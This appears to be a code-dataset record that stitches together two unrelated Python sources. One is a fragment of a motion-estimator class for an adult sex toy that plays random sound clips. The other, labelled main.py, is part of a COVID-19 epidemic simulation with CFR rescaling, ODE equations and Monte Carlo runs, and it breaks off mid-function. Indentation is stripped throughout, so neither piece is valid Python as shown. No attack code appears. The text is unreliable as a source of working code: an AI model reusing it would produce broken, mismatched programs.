def __init__(self, sound_dir, option=VelocityBasedInsertionEstimatorOption()):
self.previous_center = None
self.previous_time = None
self.remaining_wait = 0
self.state = self.OnahoState.NO_MOTION
self.option = option
self.songs = [
AudioSegment.from_mp3(sound_path)
for sound_path in glob.glob(os.path.join(sound_dir, "*.mp3"))]
# For Debug.
self.velocities = []
self.timestamps = []
def play_ex(self):
song_index = np.random.randint(0, len(self.songs))
play(self.songs[song_index])
def add_current_state(self, line, center):
# Just skip at the first frame.
if self.previous_center is not None and self.previous_time is not None:
delta_t = time.time() - self.previous_time
move_distance = np.dot(line, center - self.previous_center)
velocity = move_distance / delta_t
if velocity > self.option.forward_backward_velocity_threashold:
self.state = self.OnahoState.INSERTING
elif velocity < -self.option.forward_backward_velocity_threashold:
self.state = self.OnahoState.OUTGOING
else:
if abs(velocity) < self.option.no_motion_velocity_threashold:
if self.state == self.OnahoState.INSERTING:
if self.remaining_wait <= 0:
t = threading.Thread(target=self.play_ex)
t.start()
self.remaining_wait = self.option.sound_wait_time
print(self.state)
self.state = self.OnahoState.NO_MOTION
self.velocities.append(velocity)
self.timestamps.append(time.time())
self.previous_center = center
self.previous_time = time.time()
self.remaining_wait -= 1
|
main.py
|
"""The main module handling the simulation"""
import copy
import datetime
import logging
import os
import pickle
import queue
import random
import sys
import threading
import warnings
from functools import lru_cache
from pprint import pformat # TODO set some defaults for width/etc with partial?
import networkx as nx
import numpy as np
import pandas as pd
import tqdm
from ..numerical_libs import reimport_numerical_libs, use_cupy, xp, xp_ivp
from ..util.distributions import approx_mPERT_sample, truncnorm
from ..util.util import TqdmLoggingHandler, _banner
from .arg_parser_model import parser
from .estimation import estimate_doubling_time, estimate_Rt
from .graph import buckyGraphData
from .npi import get_npi_params
from .parameters import buckyParams
from .state import buckyState
# supress pandas warning caused by pyarrow
warnings.simplefilter(action="ignore", category=FutureWarning)
# TODO we do alot of allowing div by 0 and then checking for nans later, we should probably refactor that
warnings.simplefilter(action="ignore", category=RuntimeWarning)
# TODO move to a new file and add some more exception types
class SimulationException(Exception):
"""A generic exception to throw when there's an error related to the simulation"""
pass # pylint: disable=unnecessary-pass
@lru_cache(maxsize=None)
def get_runid(): # TODO move to util and rename to timeid or something
"""Gets a UUID based of the current datatime and caches it"""
dt_now = datetime.datetime.now()
return str(dt_now).replace(" ", "__").replace(":", "_").split(".")[0]
def frac_last_n_vals(arr, n, axis=0, offset=0): # TODO assumes come from end of array currently, move to util
"""Return the last n values along an axis of an array; if n is a float, include the fractional amount of the int(n)-1 element"""
int_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(n + offset), -int(xp.ceil(offset)) or None)]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = arr[int_slice_ind]
# handle fractional element before the standard slice
if (n + offset) % 1:
frac_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(n + offset + 1), -int(n + offset))]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = xp.concatenate((((n + offset) % 1) * arr[frac_slice_ind], ret), axis=axis)
# handle fractional element after the standard slice
if offset % 1:
frac_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(offset + 1), -int(offset) or None)]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = xp.concatenate((ret, (1.0 - (offset % 1)) * arr[frac_slice_ind]), axis=axis)
return ret
class buckyModelCovid:
"""Class that handles one full simulation (both time integration and managing MC states)"""
def __init__(
self,
debug=False,
sparse_aij=False,
t_max=None,
graph_file=None,
par_file=None,
npi_file=None,
disable_npi=False,
reject_runs=False,
):
"""Initialize the class, do some bookkeeping and read in the input graph"""
self.debug = debug
self.sparse = sparse_aij # we can default to none and autodetect
# w/ override (maybe when #adm2 > 5k and some sparsity critera?)
# Integrator params
self.dt = 1.0 # time step for model output (the internal step is adaptive...)
self.t_max = t_max
self.run_id = get_runid()
logging.info(f"Run ID: {self.run_id}")
self.npi_file = npi_file
self.disable_npi = disable_npi
self.reject_runs = reject_runs
self.output_dates = None
# COVID/model params from par file
self.bucky_params = buckyParams(par_file)
self.consts = self.bucky_params.consts
self.dists = self.bucky_params.dists
self.g_data = self.load_graph(graph_file)
def update_params(self, update_dict):
self.bucky_params.update_params(update_dict)
self.consts = self.bucky_params.consts
self.dists = self.bucky_params.dists
def load_graph(self, graph_file):
"""Load the graph data and calculate all the variables that are static across MC runs"""
# TODO refactor to just ahve this return g_data
# (it's currently the code block that used to be at the top of reset)
logging.info("loading graph")
with open(graph_file, "rb") as f:
G = pickle.load(f) # nosec
# Load data from input graph
# TODO we should go through an replace lots of math using self.g_data.* with function IN buckyGraphData
g_data = buckyGraphData(G, self.sparse)
"""
if "IFR" in G.nodes[list(G.nodes.keys())[0]]:
logging.info("Using ifr from graph")
self.use_G_ifr = True
node_IFR = nx.get_node_attributes(G, "IFR")
self.ifr = xp.asarray((np.vstack(list(node_IFR.values()))).T)
else:
self.use_G_ifr = False
"""
# Make contact mats sym and normalized
self.contact_mats = G.graph["contact_mats"]
if self.debug:
logging.debug(f"graph contact mats: {G.graph['contact_mats'].keys()}")
for mat in self.contact_mats:
c_mat = xp.array(self.contact_mats[mat])
c_mat = (c_mat + c_mat.T) / 2.0
self.contact_mats[mat] = c_mat
# remove all_locations so we can sum over the them ourselves
if "all_locations" in self.contact_mats:
del self.contact_mats["all_locations"]
# Remove unknown contact mats
valid_contact_mats = ["home", "work", "other_locations", "school"]
self.contact_mats = {k: v for k, v in self.contact_mats.items() if k in valid_contact_mats}
self.Cij = xp.vstack([self.contact_mats[k][None, ...] for k in sorted(self.contact_mats)])
# Get stratified population (and total)
self.Nij = g_data.Nij
self.Nj = g_data.Nj
self.n_age_grps = self.Nij.shape[0] # TODO factor out
n_nodes = self.Nij.shape[-1] # TODO factor out
self.first_date = datetime.date.fromisoformat(G.graph["start_date"])
# fill in npi_params either from file or as ones
self.npi_params = get_npi_params(g_data, self.first_date, self.t_max, self.npi_file, self.disable_npi)
if self.npi_params["npi_active"]:
self.Cij = xp.broadcast_to(self.Cij, (n_nodes,) + self.Cij.shape)
self.npi_params["contact_weights"] = self.npi_params["contact_weights"][..., None, None]
else:
self.Cij = xp.sum(self.Cij, axis=0)
self.Cij = (self.Cij + self.Cij.T) / 2.0
self.Cij = self.Cij / xp.sum(self.Cij, axis=1)
self.adm0_cfr_reported = None
self.adm1_cfr_reported = None
self.adm2_cfr_reported = None
# If HHS hospitalization data is on the graph, use it to rescale initial H counts and CHR
self.rescale_chr = "hhs_data" in G.graph
if self.rescale_chr:
self.adm1_current_hosp = xp.zeros((g_data.max_adm1 + 1,), dtype=float)
hhs_data = G.graph["hhs_data"].reset_index()
hhs_data = (
hhs_data.set_index("date")
.sort_index()
.groupby("adm1")
.rolling(7) # , center=True)
.mean()
.drop(columns="adm1")
.reset_index()
)
hhs_curr_data = hhs_data.loc[hhs_data.date == str(self.first_date)]
hhs_curr_data = hhs_curr_data.set_index("adm1").sort_index()
tot_hosps = (
hhs_curr_data.total_adult_patients_hospitalized_confirmed_covid
+ hhs_curr_data.total_pediatric_patients_hospitalized_confirmed_covid
)
self.adm1_current_hosp[tot_hosps.index.to_numpy()] = tot_hosps.to_numpy()
if self.debug:
logging.debug("Current hospitalizations: " + pformat(self.adm1_current_hosp))
# Estimate the recent CFR during the period covered by the historical data
cfr_delay = 15 # TODO This should come from CDC and Nij
n_cfr = 7
# last_cases = g_data.rolling_cum_cases[-cfr_delay-n_cfr:-cfr_delay] - g_data.rolling_cum_cases[0]
# last_deaths = g_data.rolling_cum_deaths[-1] - g_data.rolling_cum_deaths[cfr_delay]
last_cases = (
g_data.rolling_cum_cases[-cfr_delay - n_cfr : -cfr_delay] - g_data.rolling_cum_cases[-cfr_delay - n_cfr - 1]
)
last_deaths = g_data.rolling_cum_deaths[-n_cfr:] - g_data.rolling_cum_deaths[-n_cfr - 1]
adm1_cases = g_data.sum_adm1(last_cases.T)
adm1_deaths = g_data.sum_adm1(last_deaths.T)
adm1_cfr = adm1_deaths / adm1_cases
# take harmonic mean over n days
self.adm1_current_cfr = 1.0 / xp.mean(1.0 / adm1_cfr, axis=1)
# from IPython import embed
# embed()
chr_delay = 6 # TODO This should come from I_TO_H_TIME and Nij
n_chr = 7
tmp = hhs_data.loc[hhs_data.date > str(self.first_date - datetime.timedelta(days=n_chr))]
tmp = tmp.loc[tmp.date <= str(self.first_date)]
tmp = tmp.set_index(["adm1", "date"]).sort_index()
tmp = tmp.previous_day_admission_adult_covid_confirmed + tmp.previous_day_admission_pediatric_covid_confirmed
cum_hosps = xp.zeros(adm1_cfr.shape)
tmp = tmp.unstack()
# embed()
tmp_data = tmp.T.cumsum().to_numpy()
tmp_ind = tmp.index.to_numpy()
cum_hosps[tmp_ind] = tmp_data.T
last_cases = (
g_data.rolling_cum_cases[-chr_delay - n_chr : -chr_delay] - g_data.rolling_cum_cases[-chr_delay - n_chr - 1]
)
# last_hosps = cum_hosps #g_data.rolling_cum_deaths[-n_chr:] - g_data.rolling_cum_deaths[-n_chr-1]
adm1_cases = g_data.sum_adm1(last_cases.T)
adm1_hosps = cum_hosps # g_data.sum_adm1(last_hosps.T)
adm1_chr = adm1_hosps / adm1_cases
# take harmonic mean over n days
self.adm1_current_chr = 1.0 / xp.mean(1.0 / adm1_chr, axis=1)
if self.debug:
logging.debug("Current CFR: " + pformat(self.adm1_current_cfr))
return g_data
def reset(self, seed=None, params=None):
"""Reset the state of the model and generate new inital data from a new random seed"""
# TODO we should refactor reset of the compartments to be real pop numbers then /Nij at the end
# if you set a seed using the constructor, you're stuck using it forever (TODO this isn't true anymore?)
if seed is not None:
random.seed(seed)
np.random.seed(seed)
xp.random.seed(seed)
self.iter = 0
# reroll model params if we're doing that kind of thing
self.g_data.Aij.perturb(self.consts.reroll_variance)
self.params = self.bucky_params.generate_params(self.consts.reroll_variance)
if params is not None:
self.params = copy.deepcopy(params)
if self.debug:
logging.debug("params: " + pformat(self.params, width=120))
for k in self.params:
if type(self.params[k]).__module__ == np.__name__:
self.params[k] = xp.asarray(self.params[k])
# TODO consolidate all the broadcast_to calls
self.params.H = xp.broadcast_to(self.params.H[:, None], self.Nij.shape)
self.params.F = xp.broadcast_to(self.params.F[:, None], self.Nij.shape)
"""
if self.use_G_ifr: # TODO this is pretty much overwriteen with the CHR rescale...
self.ifr[xp.isnan(self.ifr)] = 0.0
self.params.F = self.ifr / self.params["SYM_FRAC"]
adm0_ifr = xp.sum(self.ifr * self.Nij) / xp.sum(self.Nj)
ifr_scale = 0.0065 / adm0_ifr # TODO this should be in par file (its from planning scenario5)
self.params.F = xp.clip(self.params.F * ifr_scale, 0.0, 1.0)
self.params.F_old = self.params.F.copy()
"""
if self.rescale_chr:
# TODO this needs to be cleaned up BAD
# should add a util function to do the rollups to adm1 (it shows up in case_reporting/doubling t calc too)
# TODO this could be a population distribute type func...
adm1_Fi = self.g_data.sum_adm1((self.params.F * self.Nij).T).T
adm1_Ni = self.g_data.adm1_Nij # sum_adm1(self.Nij.T)
adm1_N = self.g_data.adm1_Nj # sum_adm1(self.Nj)
adm1_Fi = adm1_Fi / adm1_Ni # TODO this will always be F, not sure what I was going for here...
adm1_F = xp.nanmean(adm1_Fi, axis=0)
adm1_F_fac = self.adm1_current_cfr / adm1_F
adm0_F_fac = xp.nanmean(adm1_N * adm1_F_fac) / xp.sum(adm1_N)
adm1_F_fac[xp.isnan(adm1_F_fac)] = adm0_F_fac
F_RR_fac = truncnorm(1.0, self.dists.F_RR_var, size=adm1_F_fac.size, a_min=1e-6)
adm1_F_fac = adm1_F_fac * F_RR_fac
adm1_F_fac = xp.clip(adm1_F_fac, a_min=0.1, a_max=10.0) # prevent extreme values
if self.debug:
logging.debug("adm1 cfr rescaling factor: " + pformat(adm1_F_fac))
self.params.F = self.params.F * adm1_F_fac[self.g_data.adm1_id]
self.params.F = xp.clip(self.params.F, a_min=1.0e-10, a_max=1.0)
adm1_Hi = self.g_data.sum_adm1((self.params.H * self.Nij).T).T
# adm1_Ni = self.g_data.sum_adm1(self.Nij.T)
adm1_Hi = adm1_Hi / adm1_Ni
adm1_H = xp.nanmean(adm1_Hi, axis=0)
adm1_H_fac = self.adm1_current_chr / adm1_H
adm0_H_fac = xp.nanmean(adm1_N * adm1_H_fac) / xp.sum(adm1_N)
adm1_H_fac[xp.isnan(adm1_H_fac)] = adm0_H_fac
H_RR_fac = truncnorm(1.0, self.dists.H_RR_var, size=adm1_H_fac.size, a_min=1e-6)
adm1_H_fac = adm1_H_fac * H_RR_fac
adm1_H_fac = xp.clip(adm1_H_fac, a_min=0.1, a_max=10.0) # prevent extreme values
if self.debug:
logging.debug("adm1 chr rescaling factor: " + pformat(adm1_H_fac))
self.params.H = self.params.H * adm1_H_fac[self.g_data.adm1_id]
self.params.H = xp.clip(self.params.H, a_min=self.params.F, a_max=1.0)
# crr_days_needed = max( #TODO this depends on all the Td params, and D_REPORT_TIME...
case_reporting = self.estimate_reporting(
self.g_data,
self.params,
cfr=self.params.F,
days_back=22,
min_deaths=self.consts.case_reporting_min_deaths,
)
self.case_reporting = approx_mPERT_sample( # TODO these facs should go in param file
mu=xp.clip(case_reporting, a_min=0.2, a_max=1.0),
a=xp.clip(0.8 * case_reporting, a_min=0.2, a_max=None),
b=xp.clip(1.2 * case_reporting, a_min=None, a_max=1.0),
gamma=50.0,
)
self.doubling_t = xp.zeros(self.Nj.shape)
# self.doubling_t = estimate_doubling_time(g_data,
# doubling_time_window=self.consts.doubling_t_window,
# mean_time_window=self.consts.doubling_t_N_historical_days,
# self.case_reporting,
# )
# if xp.any(~xp.isfinite(self.doubling_t)):
# logging.info("non finite doubling times, is there enough case data?")
# if self.debug:
# logging.debug(self.doubling_t)
# logging.debug(self.g_data.adm1_id[~xp.isfinite(self.doubling_t)])
# raise SimulationException
# if self.consts.reroll_variance > 0.0:
# self.doubling_t *= truncnorm(1.0, self.consts.reroll_variance, size=self.doubling_t.shape, a_min=1e-6)
# self.doubling_t = xp.clip(self.doubling_t, 1.0, None) / 2.0
# self.params = self.bucky_params.rescale_doubling_rate(self.doubling_t, self.params, self.g_data.Aij.diag)
mean_case_reporting = xp.mean(self.case_reporting[-self.consts.case_reporting_N_historical_days :], axis=0)
self.params["CASE_REPORT"] = mean_case_reporting
self.params["THETA"] = xp.broadcast_to(
self.params["THETA"][:, None], self.Nij.shape
) # TODO move all the broadcast_to's to one place, they're all over reset()
self.params["GAMMA_H"] = xp.broadcast_to(self.params["GAMMA_H"][:, None], self.Nij.shape)
self.params["F_eff"] = xp.clip(self.params["F"] / self.params["H"], 0.0, 1.0)
Rt = estimate_Rt(self.g_data, self.params)
Rt_fac = approx_mPERT_sample(**(self.dists.Rt_dist))
Rt *= Rt_fac # truncnorm(1.0, 1.5 * self.consts.reroll_variance, size=Rt.shape, a_min=1e-6)
self.params["R0"] = Rt
self.params["BETA"] = Rt * self.params["GAMMA"] / self.g_data.Aij.diag
# init state vector (self.y)
yy = buckyState(self.consts, self.Nij)
if self.debug:
logging.debug("case init")
Ti = self.params.Ti
current_I = xp.sum(frac_last_n_vals(self.g_data.inc_case_hist, Ti, axis=0), axis=0)
current_I[xp.isnan(current_I)] = 0.0
current_I[current_I < 0.0] = 0.0
current_I *= 1.0 / (self.params["CASE_REPORT"])
# Roll some random factors for the init compartment values
R_fac = approx_mPERT_sample(**(self.dists.R_fac_dist))
E_fac = approx_mPERT_sample(**(self.dists.E_fac_dist))
H_fac = approx_mPERT_sample(**(self.dists.H_fac_dist))
I_init = E_fac * current_I[None, :] / self.Nij / self.n_age_grps
D_init = self.g_data.cum_death_hist[-1][None, :] / self.Nij / self.n_age_grps
recovered_init = (
self.g_data.cum_case_hist[-1] / self.params["SYM_FRAC"] / (self.params["CASE_REPORT"])
) * R_fac
R_init = (
(recovered_init) / self.Nij / self.n_age_grps - D_init - I_init / self.params["SYM_FRAC"]
) # rh handled later
# self.params.H = self.params.H * H_fac
# ic_frac = 1.0 / (1.0 + self.params.THETA / self.params.GAMMA_H)
# hosp_frac = 1.0 / (1.0 + self.params.GAMMA_H / self.params.THETA)
# print(ic_frac + hosp_frac)
exp_frac = (
E_fac
* xp.ones(I_init.shape[-1])
# * np.diag(self.A)
# * np.sum(self.A, axis=1)
* (self.params.R0) # @ self.A)
* self.params.GAMMA
/ self.params.SIGMA
)
ic_fac = 1.0
yy.I = (1.0 - self.params.H) * I_init / yy.Im
yy.Ic = ic_fac * self.params.H * I_init / yy.Im
yy.Rh = self.params.H * I_init * self.params.GAMMA_H / self.params.THETA / yy.Rhn
if self.rescale_chr:
adm1_hosp = xp.zeros((self.g_data.max_adm1 + 1,), dtype=float)
xp.scatter_add(adm1_hosp, self.g_data.adm1_id, xp.sum(yy.Rh * self.Nij, axis=(0, 1)))
adm2_hosp_frac = (self.adm1_current_hosp / adm1_hosp)[self.g_data.adm1_id]
adm0_hosp_frac = xp.nansum(self.adm1_current_hosp) / xp.nansum(adm1_hosp)
adm2_hosp_frac[xp.isnan(adm2_hosp_frac)] = adm0_hosp_frac
# self.params.F = 2. * xp.clip(1.0 / (H_fac * adm2_hosp_frac[None, :]) * self.params.F, 1.0e-10, 1.0)
# self.params.H = xp.clip(H_fac * self.params.H * adm2_hosp_frac[None, :], self.params.F, 1.0)
# TODO this .85 should be in param file...
scaling_F = self.consts.F_scaling
scaling_H = adm2_hosp_frac * H_fac
self.params["F_eff"] = xp.clip(scaling_F * self.params["F"] / self.params["H"], 0.0, 1.0)
# yy.I = (1.0 - self.params.H) * I_init / yy.Im
# y[Ici] = ic_frac * self.params.H * I_init / (len(Ici))
# y[Rhi] = hosp_frac * self.params.H * I_init / (Rhn)
yy.Ic = scaling_H * ic_fac * self.params.H * I_init / yy.Im
yy.Rh = (
scaling_H
# * self.params.CASE_REPORT
* self.params.H
* I_init
* self.params.GAMMA_H
/ self.params.THETA
/ yy.Rhn
)
R_init -= xp.sum(yy.Rh, axis=0)
yy.Ia = self.params.ASYM_FRAC / self.params.SYM_FRAC * I_init / yy.Im
yy.E = exp_frac[None, :] * I_init / yy.En
yy.R = R_init
yy.D = D_init
yy.init_S()
# init the bin we're using to track incident cases (it's filled with cumulatives until we diff it later)
yy.incC = self.g_data.cum_case_hist[-1][None, :] / self.Nij / self.n_age_grps
self.y = yy
# TODO assert this is 1. (need to take mean and around b/c fp err)
# if xp.sum(self.y, axis=0)
if xp.any(~xp.isfinite(self.y.state)):
logging.info("nonfinite values in the state vector, something is wrong with init")
raise SimulationException
if self.debug:
logging.debug("done reset()")
# return y
# @staticmethod need to mode the caching out b/c its in the self namespace
def estimate_reporting(self, g_data, params, cfr, days_back=14, case_lag=None, min_deaths=100.0):
"""Estimate the case reporting rate based off observed vs. expected CFR"""
if case_lag is None:
adm0_cfr_by_age = xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0)
adm0_cfr_total = xp.sum(
xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0),
axis=0,
)
case_lag = xp.sum(params["D_REPORT_TIME"] * adm0_cfr_by_age / adm0_cfr_total, axis=0)
case_lag_int = int(case_lag)
recent_cum_cases = g_data.rolling_cum_cases - g_data.rolling_cum_cases[0]
recent_cum_deaths = g_data.rolling_cum_deaths - g_data.rolling_cum_deaths[0]
case_lag_frac = case_lag % 1 # TODO replace with util function for the indexing
cases_lagged = frac_last_n_vals(recent_cum_cases, days_back + case_lag_frac, offset=case_lag_int)
if case_lag_frac:
cases_lagged = cases_lagged[0] + cases_lagged[1:]
# adm0
adm0_cfr_param = xp.sum(xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0), axis=0)
if self.adm0_cfr_reported is None:
self.adm0_cfr_reported = xp.sum(recent_cum_deaths[-days_back:], axis=1) / xp.sum(cases_lagged, axis=1)
adm0_case_report = adm0_cfr_param / self.adm0_cfr_reported
"""
if self.debug:
logging.debug("Adm0 case reporting rate: " + pformat(adm0_case_report))
if xp.any(~xp.isfinite(adm0_case_report)):
if self.debug:
logging.debug("adm0 case report not finite")
logging.debug(adm0_cfr_param)
logging.debug(self.adm0_cfr_reported)
raise SimulationException
"""
case_report = xp.repeat(adm0_case_report[:, None], cases_lagged.shape[-1], axis=1)
# adm1
adm1_cfr_param = xp.zeros((g_data.max_adm1 + 1,), dtype=float)
adm1_totpop = g_data.adm1_Nj # xp.zeros((self.g_data.max_adm1 + 1,), dtype=float)
tmp_adm1_cfr = xp.sum(cfr * g_data.Nij, axis=0)
xp.scatter_add(adm1_cfr_param, g_data.adm1_id, tmp_adm1_cfr)
# xp.scatter_add(adm1_totpop, self.g_data.adm1_id, self.Nj)
adm1_cfr_param /= adm1_totpop
# adm1_cfr_reported is const, only calc it once and cache it
if self.adm1_cfr_reported is None:
self.adm1_deaths_reported = xp.zeros((g_data.max_adm1 + 1, days_back), dtype=float)
adm1_lagged_cases = xp.zeros((g_data.max_adm1 + 1, days_back), dtype=float)
xp.scatter_add(
self.adm1_deaths_reported,
g_data.adm1_id,
recent_cum_deaths[-days_back:].T,
)
xp.scatter_add(adm1_lagged_cases, g_data.adm1_id, cases_lagged.T)
self.adm1_cfr_reported = self.adm1_deaths_reported / adm1_lagged_cases
adm1_case_report = (adm1_cfr_param[:, None] / self.adm1_cfr_reported)[g_data.adm1_id].T
valid_mask = (self.adm1_deaths_reported > min_deaths)[g_data.adm1_id].T & xp.isfinite(adm1_case_report)
case_report[valid_mask] = adm1_case_report[valid_mask]
# adm2
adm2_cfr_param = xp.sum(cfr * (g_data.Nij / g_data.Nj), axis=0)
if self.adm2_cfr_reported is None:
self.adm2_cfr_reported = recent_cum_deaths[-days_back:] / cases_lagged
adm2_case_report = adm2_cfr_param / self.adm2_cfr_reported
valid_adm2_cr = xp.isfinite(adm2_case_report) & (recent_cum_deaths[-days_back:] > min_deaths)
case_report[valid_adm2_cr] = adm2_case_report[valid_adm2_cr]
return case_report
#
# RHS for odes - d(sstate)/dt = F(t, state, *mats, *pars)
# NB: requires the state vector be 1d
#
@staticmethod
def RHS_func(t, y_flat, Nij, contact_mats, Aij, par, npi, aij_sparse, y):
"""RHS function for the ODEs, get's called in ivp.solve_ivp"""
# constraint on values
lower, upper = (0.0, 1.0) # bounds for state vars
# grab index of OOB values so we can zero derivatives (stability...)
too_low = y_flat <= lower
too_high = y_flat >= upper
# TODO we're passing in y.state just to overwrite it, we probably need another class
# reshape to the usual state tensor (compartment, age, node)
y.state = y_flat.reshape(y.state_shape)
# Clip state to be in bounds (except allocs b/c thats a counter)
xp.clip(y.state, a_min=lower, a_max=upper, out=y.state)
# init d(state)/dt
dy = y.zeros_like()
# effective params after damping w/ allocated stuff
if npi["npi_active"]:
# We want to avoid doing this int cast if we arent using npis b/c it forces a sync
t_index = min(int(t), npi["r0_reduct"].shape[0] - 1) # prevent OOB error when integrator overshoots
BETA_eff = npi["r0_reduct"][t_index] * par["BETA"]
else:
BETA_eff = par["BETA"]
F_eff = par["F_eff"]
HOSP = par["H"]
THETA = y.Rhn * par["THETA"]
GAMMA = y.Im * par["GAMMA"]
GAMMA_H = y.Im * par["GAMMA_H"]
SIGMA = y.En * par["SIGMA"]
SYM_FRAC = par["SYM_FRAC"]
CASE_REPORT = par["CASE_REPORT"]
if npi["npi_active"]:
Cij = npi["contact_weights"][t_index] * contact_mats
# TODO this should be c + c.T / 2
Cij = xp.sum(Cij, axis=1)
Cij /= xp.sum(Cij, axis=2, keepdims=True)
else:
Cij = contact_mats
if npi["npi_active"]:
if aij_sparse:
Aij_eff = Aij.multiply(npi["mobility_reduct"][t_index])
else:
Aij_eff = npi["mobility_reduct"][t_index] * Aij
else:
Aij_eff = Aij
# perturb Aij
# new_R0_fracij = truncnorm(xp, 1.0, .1, size=Aij.shape, a_min=1e-6)
# new_R0_fracij = xp.clip(new_R0_fracij, 1e-6, None)
# A = Aij * new_R0_fracij
# Aij_eff = A / xp.sum(A, axis=0)
# Infectivity matrix (I made this name up, idk what its really called)
I_tot = xp.sum(Nij * y.Itot, axis=0) - (1.0 - par["rel_inf_asym"]) * xp.sum(Nij * y.Ia, axis=0)
# I_tmp = (Aij.T @ I_tot.T).T
if aij_sparse:
I_tmp = (Aij_eff.T * I_tot.T).T
else:
I_tmp = I_tot @ Aij # using identity (A@B).T = B.T @ A.T
# beta_mat = y.S * xp.squeeze((Cij @ I_tmp.T[..., None]), axis=-1).T
beta_mat = y.S * (Cij @ xp.atleast_3d(I_tmp.T)).T[0]
beta_mat /= Nij
# dS/dt
dy.S = -BETA_eff * (beta_mat)
# dE/dt
dy.E[0] = BETA_eff * (beta_mat) - SIGMA * y.E[0]
dy.E[1:] = SIGMA * (y.E[:-1] - y.E[1:])
# dI/dt
dy.Ia[0] = (1.0 - SYM_FRAC) * SIGMA * y.E[-1] - GAMMA * y.Ia[0]
dy.Ia[1:] = GAMMA * (y.Ia[:-1] - y.Ia[1:])
# dIa/dt
dy.I[0] = SYM_FRAC * (1.0 - HOSP) * SIGMA * y.E[-1] - GAMMA * y.I[0]
dy.I[1:] = GAMMA * (y.I[:-1] - y.I[1:])
# dIc/dt
dy.Ic[0] = SYM_FRAC * HOSP * SIGMA * y.E[-1] - GAMMA_H * y.Ic[0]
dy.Ic[1:] = GAMMA_H * (y.Ic[:-1] - y.Ic[1:])
# dRhi/dt
dy.Rh[0] = GAMMA_H * y.Ic[-1] - THETA * y.Rh[0]
dy.Rh[1:] = THETA * (y.Rh[:-1] - y.Rh[1:])
# dR/dt
dy.R = GAMMA * (y.I[-1] + y.Ia[-1]) + (1.0 - F_eff) * THETA * y.Rh[-1]
# dD/dt
dy.D = F_eff * THETA * y.Rh[-1]
dy.incH = GAMMA_H * y.Ic[-1] # SYM_FRAC * HOSP * SIGMA * y.E[-1]
dy.incC = SYM_FRAC * CASE_REPORT * SIGMA * y.E[-1]
# bring back to 1d for the ODE api
dy_flat = dy.state.ravel()
# zero derivatives for things we had to clip if they are going further out of bounds
dy_flat = xp.where(too_low & (dy_flat < 0.0), 0.0, dy_flat)
dy_flat = xp.where(too_high & (dy_flat > 0.0), 0.0, dy_flat)
return dy_flat
def run_once(self, seed=None):
"""Perform one complete run of the simulation"""
# rename to integrate or something? it also resets...
# reset everything
logging.debug("Resetting state")
self.reset(seed=seed)
logging.debug("Done reset")
# do integration
logging.debug("Starting integration")
t_eval = xp.arange(0, self.t_max + self.dt, self.dt)
sol = xp_ivp.solve_ivp(
self.RHS_func,
method="RK23",
t_span=(0.0, self.t_max),
y0=self.y.state.ravel(),
t_eval=t_eval,
args=(self.Nij, self.Cij, self.g_data.Aij.A, self.params, self.npi_params, self.g_data.Aij.sparse, self.y),
)
logging.debug("Done integration")
return sol
def run_multiple(self, n_mc, base_seed=42, out_columns=None):
"""Perform multiple monte carlos and return their postprocessed results"""
seed_seq = np.random.SeedSequence(base_seed)
success = 0
ret = []
pbar = tqdm.tqdm(total=n_mc, desc="Performing Monte Carlos", dynamic_ncols=True)
while success < n_mc:
mc_seed = seed_seq.spawn(1)[0].generate_state(1)[0] # inc spawn key then grab next seed
pbar.set_postfix_str(
"seed=" + str(mc_seed),
refresh=True,
)
try:
with xp.optimize_kernels():
sol = self.run_once(seed=mc_seed)
df_data = self.postprocess_run(sol, mc_seed, out_columns)
ret.append(df_data)
success += 1
pbar.update(1)
except SimulationException:
pass
pbar.close()
return ret
# TODO Move this to a class thats like run_parser or something (that caches all the info it needs like Nij, and manages the write thread/queue)
# Also give it methods like to_dlpack, to_pytorch, etc
def to_feather(self, sol, base_filename, seed, output_queue):
"""Postprocess and write to disk the output of run_once"""
df_data = self.postprocess_run(sol, seed)
# flatten the shape
for c in df_data:
df_data[c] = df_data[c].ravel()
# push the data off to the write thread
output_queue.put((base_filename, df_data))
# TODO we should output the per monte carlo param rolls, this got lost when we switched from hdf5
def postprocess_run(self, sol, seed, columns=None):
"""Process the output of a run (sol, returned by the integrator) into the requested output vars"""
if columns is None:
columns = [
"adm2_id",
"date",
"rid",
"total_population",
"current_hospitalizations",
"active_asymptomatic_cases",
"cumulative_deaths",
"daily_hospitalizations",
"daily_cases",
"daily_reported_cases",
"daily_deaths",
"cumulative_cases",
"cumulative_reported_cases",
"current_icu_usage",
"current_vent_usage",
"case_reporting_rate",
"R_eff",
"doubling_t",
]
columns = set(columns)
df_data = {}
out = buckyState(self.consts, self.Nij)
y = sol.y.reshape(self.y.state_shape + (sol.y.shape[-1],))
# rescale by population
out.state = self.Nij[None, ..., None] * y
# collapse age groups
out.state = xp.sum(out.state, axis=1)
# population_conserved = (xp.diff(xp.around(xp.sum(out.N, axis=(0, 1)), 1)) == 0.0).all()
# if not population_conserved:
# pass # TODO we're getting small fp errors here
# # print(xp.sum(xp.diff(xp.around(xp.sum(out[:incH], axis=(0, 1)), 1))))
# # logging.error("Population not conserved!")
# # print(xp.sum(xp.sum(y[:incH],axis=0)-1.))
# # raise SimulationException
if "adm2_id" in columns:
adm2_ids = np.broadcast_to(self.g_data.adm2_id[:, None], out.state.shape[1:])
df_data["adm2_id"] = adm2_ids
if "date" in columns:
if self.output_dates is None:
t_output = xp.to_cpu(sol.t)
dates = [pd.Timestamp(self.first_date + datetime.timedelta(days=np.round(t))) for t in t_output]
self.output_dates = np.broadcast_to(dates, out.state.shape[1:])
dates = self.output_dates
df_data["date"] = dates
if "rid" in columns:
df_data["rid"] = np.broadcast_to(seed, out.state.shape[1:])
if "current_icu_usage" in columns or "current_vent_usage" in columns:
icu = self.Nij[..., None] * self.params["ICU_FRAC"][:, None, None] * xp.sum(y[out.indices["Rh"]], axis=0)
if "current_icu_usage" in columns:
df_data["current_icu_usage"] = xp.sum(icu, axis=0)
if "current_vent_usage" in columns:
vent = self.params.ICU_VENT_FRAC[:, None, None] * icu
